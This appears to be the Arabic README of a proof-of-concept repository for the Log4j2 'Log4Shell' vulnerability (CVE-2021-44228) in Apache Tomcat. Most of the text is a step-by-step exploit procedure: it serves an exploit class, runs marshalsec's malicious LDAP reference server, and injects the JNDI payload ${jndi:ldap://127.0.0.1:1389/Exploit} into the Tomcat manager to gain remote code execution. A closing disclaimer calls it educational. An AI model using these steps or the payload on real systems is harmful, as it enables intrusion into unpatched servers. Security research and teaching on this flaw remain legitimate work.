
إثبات المفهوم لثغرة Log4j2 CVE-2021-44228 في Apache Tomcat

git clone
cd apache-tomcat-10.0.14/bin
startup.bat
cd exploit
py -m http.server 8888
cd exploit
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"
أدخل ${jndi:ldap://127.0.0.1:1389/Exploit} في الحقل 'XML Configuration file path' داخل تطبيق المدير http://localhost:8080/manager/html
يتم تحميل صنف الاستغلال ويتم تنفيذ RCE (سيتم فتح تطبيق الآلة الحاسبة)
هذا المستودع هو مجرد POC لأغراض تعليمية. مالك المستودع غير مسؤول عن أي أضرار تحدث. كملاحظة أخلاقية، لا تكن شريرًا.
استغلال LDAP https://github.com/mbechler/marshalsec